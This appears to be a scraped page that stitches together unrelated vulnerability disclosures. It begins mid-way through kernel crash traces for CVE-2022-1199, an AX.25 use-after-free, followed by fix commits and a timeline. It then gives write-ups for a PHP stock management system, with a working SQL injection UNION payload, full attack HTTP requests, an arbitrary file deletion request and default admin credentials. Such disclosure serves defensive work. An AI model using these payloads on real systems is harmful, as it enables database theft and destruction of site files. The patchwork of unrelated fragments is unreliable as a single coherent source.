\[  727.493561\]  rollback\_registered\_many+0x2e1/0x1130
\[  727.493561\]  ? dev\_alloc\_name+0xf0/0xf0
\[  727.493561\]  ? ldsem\_down\_read+0x650/0x650
\[  727.493561\]  unregister\_netdevice\_queue+0x1d7/0x3e0
\[  727.493561\]  ? unregister\_netdevice\_many+0x50/0x50
\[  727.493561\]  ? \_raw\_write\_lock\_bh+0xd0/0xd0
\[  727.493561\]  ? down\_write\_killable+0x120/0x120
\[  727.493561\]  unregister\_netdev+0x13/0x20
\[  727.493561\]  mkiss\_close+0x116/0x1f0
\[  727.493561\]  tty\_ldisc\_hangup+0x227/0x5f0
\[  727.493561\]  ? fasync\_remove\_entry+0x28/0x220
\[  727.493561\]  \_\_tty\_hangup.part.0+0x41c/0x910
\[  727.493561\]  tty\_release+0x3a8/0xcc0
\[  727.493561\]  \_\_fput+0x1e2/0x840
\[  727.493561\]  task\_work\_run+0xe8/0x180
\[  727.493561\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  727.493561\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  727.493561\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  727.493561\] RIP: 0033:0x7f6d2c9d4beb
\[  727.493561\] Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 33 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44
\[  727.493561\] RSP: 002b:00007f5cab711ec0 EFLAGS: 00000293 ORIG\_RAX: 0000000000000003
\[  727.493561\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f6d2c9d4beb
\[  727.493561\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003
\[  727.493561\] RBP: 00007f5cab711f00 R08: 0000000000000000 R09: 00007f5cab712700
\[  727.493561\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffee89407be
\[  727.493561\] R13: 00007ffee89407bf R14: 00007f5cab711fc0 R15: 00007f5cab712700

The UAF bug related with lock\_sock() is shown below.

\[  208.472360\] BUG: KASAN: use-after-free in \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\] Write of size 4 at addr ffff88800a0e8088 by task ax25\_clo\_bin/1271
\[  208.472465\] Call Trace:
\[  208.472465\]  dump\_stack+0x7d/0xa3
\[  208.472465\]  print\_address\_description.constprop.0+0x18/0x130
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  kasan\_report.cold+0x7f/0x10e
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  check\_memory\_region+0xf9/0x1e0
\[  208.472465\]  \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? schedule+0x8e/0x120
\[  208.472465\]  \_\_lock\_sock+0xd9/0x140
\[  208.472465\]  ? sock\_omalloc+0xc0/0xc0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? wait\_woken+0x110/0x110
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x80/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  lock\_sock\_nested+0x72/0x80
\[  208.472465\]  ax25\_device\_event+0xef/0x160
\[  208.472465\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.472465\]  dev\_close\_many+0x17d/0x230
\[  208.472465\]  ? \_\_dev\_close\_many+0x1c0/0x1c0
\[  208.472465\]  ? \_\_schedule+0x494/0xc30
\[  208.472465\]  rollback\_registered\_many+0x1f1/0x950
\[  208.472465\]  ? clockevents\_program\_event+0xd3/0x130
\[  208.472465\]  ? dev\_alloc\_name+0xd0/0xd0
\[  208.472465\]  ? ldsem\_down\_read+0x410/0x410
\[  208.472465\]  unregister\_netdevice\_queue+0x133/0x200
\[  208.472465\]  ? unregister\_netdevice\_many+0x20/0x20
\[  208.472465\]  ? \_raw\_write\_lock\_bh+0xd0/0xd0
\[  208.472465\]  unregister\_netdev+0x13/0x20
\[  208.472465\]  mkiss\_close+0xc4/0x120
\[  208.472465\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  208.472465\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  208.472465\]  tty\_release+0x200/0x670
\[  208.472465\]  \_\_fput+0x104/0x3b0
\[  208.472465\]  task\_work\_run+0x8f/0xd0
\[  208.472465\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  208.472465\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.472465\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.472465\] RIP: 0033:0x7f7900bb1beb
\[  208.472465\] Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 33 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44 24 0c e8 71 fc ff ff 8b 44
\[  208.472465\] RSP: 002b:00007f78ff9c8ec0 EFLAGS: 00000293 ORIG\_RAX: 0000000000000003
\[  208.472465\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f7900bb1beb
\[  208.472465\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003
\[  208.472465\] RBP: 00007f78ff9c8f00 R08: 0000000000000000 R09: 00007f78ff9c9700
\[  208.472465\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffd364d6b9e
\[  208.472465\] R13: 00007ffd364d6b9f R14: 00007f78ff9c8fc0 R15: 00007f78ff9c9700

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Fix  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch that have been applied to mainline Linux kernel is shown below.
https://github.com/torvalds/linux/commit/4e0f718daf97d47cf7dec122da1be970f145c809
https://github.com/torvalds/linux/commit/7ec02f5ac8a5be5a3f20611731243dc5e1d9ba10
https://github.com/torvalds/linux/commit/71171ac8eb34ce7fe6b3267dce27c313ab3cb3ac

=\*=\*=\*=\*=\*=\*=\*=\*=  Timeline  =\*=\*=\*=\*=\*=\*=\*=\*=

2022-01-28: commit 4e0f718daf97 accepted to mainline kernel
2022-02-09: commit 7ec02f5ac8a5 accepted to mainline kernel
2022-03-09: commit 71171ac8eb34 accepted to mainline kernel
2022-04-01: CVE-2022-1199 is assigned

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=

Duoming Zhou <duoming@....edu.cn>

Best Regards,
Duoming Zhou

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1199: security - CVE-2022-1199 kernel: Null pointer dereference and use-after-free in ax25_release()

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user&id=.

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/?page=user/manage\_user&id=

Vulnerability location: /isms/admin/?page=user/manage\_user&id=, id

db\_name = isms\_db;

\[+\] Payload: /isms/admin/?page=user/manage\_user&id=-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> id

GET /isms/admin/?page\=user/manage\_user&id\=\-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

CVE-2022-36690: vul-wiki/SQLi-4.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /classes/Master.php?f=delete_img.

**Ingredients Stock Management System v1.0 by oretnom23 has Delete any file**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/classes/Master.php?f=delete\_img

Vulnerability location: /isms/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shell.php file in the root directory

POST /isms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
path=C:\\xampp\\htdocs\\pms\\shell.php

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the root directory of the website

The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists. 

By this time, shell.php has been deleted.

Tag

#windows